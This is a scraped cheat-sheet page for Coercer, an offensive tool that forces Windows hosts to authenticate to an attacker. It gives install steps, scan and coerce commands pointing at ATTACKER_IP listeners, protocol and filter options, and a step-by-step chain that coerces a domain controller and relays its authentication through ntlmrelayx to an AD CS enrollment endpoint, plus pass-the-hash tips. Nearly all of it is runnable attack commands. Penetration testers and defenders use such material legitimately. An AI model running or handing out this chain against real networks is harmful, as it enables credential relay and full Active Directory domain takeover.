Thanks to visit codestin.com
Credit goes to github.com

Skip to content

coercer.md

Latest commit

 

History

History
102 lines (73 loc) · 2.98 KB

coercer.md

File metadata and controls

102 lines (73 loc) · 2.98 KB

Coercer

Overview

Coercer is a tool that automates the scanning and exploitation of Windows coercion methods. It supports all known MS-RPC coercion techniques (PetitPotam, PrinterBug, DFSCoerce, ShadowCoerce, and more) in a single tool.

Installation

pip3 install coercer

# From source
git clone https://github.com/p0dalirius/Coercer.git
cd Coercer
pip3 install .

Scanning for Available Methods

# Scan a target for all available coercion methods
coercer scan -t TARGET_IP -u user -p password -d domain.local

# Scan with specific protocol filter
coercer scan -t TARGET_IP -u user -p password -d domain.local \
  --filter-protocol-name MS-EFSRPC

# Scan with NT hash
coercer scan -t TARGET_IP -u user -H NTHASH -d domain.local

# Scan multiple targets
coercer scan -t 10.10.10.0/24 -u user -p password -d domain.local

Exploiting Coercion

# Coerce using all available methods
coercer coerce -t TARGET_IP -l ATTACKER_IP -u user -p password -d domain.local

# Coerce with specific method
coercer coerce -t TARGET_IP -l ATTACKER_IP -u user -p password -d domain.local \
  --filter-method-name EfsRpcOpenFileRaw

# Coerce with specific protocol
coercer coerce -t TARGET_IP -l ATTACKER_IP -u user -p password -d domain.local \
  --filter-protocol-name MS-RPRN

# WebDAV coercion (HTTP auth)
coercer coerce -t TARGET_IP -l 'ATTACKER_HOST@80/test' -u user -p password -d domain.local

Supported Protocols

Protocol Methods Service
MS-EFSRPC EfsRpcOpenFileRaw, EfsRpcEncryptFileSrv, etc. EFS (PetitPotam)
MS-RPRN RpcRemoteFindFirstPrinterChangeNotification Print Spooler
MS-DFSNM NetrDfsRemoveStdRoot, NetrDfsAddStdRoot DFS Namespace
MS-FSRVP IsPathSupported, IsPathShadowCopied File Server VSS
MS-EFSR Additional EFS methods EFS variants

Filtering Options

# By protocol
--filter-protocol-name MS-EFSRPC

# By method name
--filter-method-name EfsRpcOpenFileRaw

# By transport (SMB pipe or direct TCP)
--filter-transport msrpc

Practical Usage Pattern

# Step 1: Scan the target
coercer scan -t DC_IP -u user -p password -d domain.local
# Review which methods are available

# Step 2: Start your relay listener
ntlmrelayx.py -t http://CA_IP/certsrv/certfnsh.asp --adcs --template DomainController -smb2support

# Step 3: Coerce
coercer coerce -t DC_IP -l ATTACKER_IP -u user -p password -d domain.local

# Step 4: Check ntlmrelayx output for successful relay

Tips

  1. Always scan before coercing — not all methods work on all targets
  2. Use --filter-protocol-name to target specific methods if one doesn't work
  3. For LDAP relay, use the WebDAV format: -l 'hostname@80/test'
  4. Coercer supports Kerberos auth (-k) and pass-the-hash (-H)
  5. Some methods are patched — Coercer will report which ones fail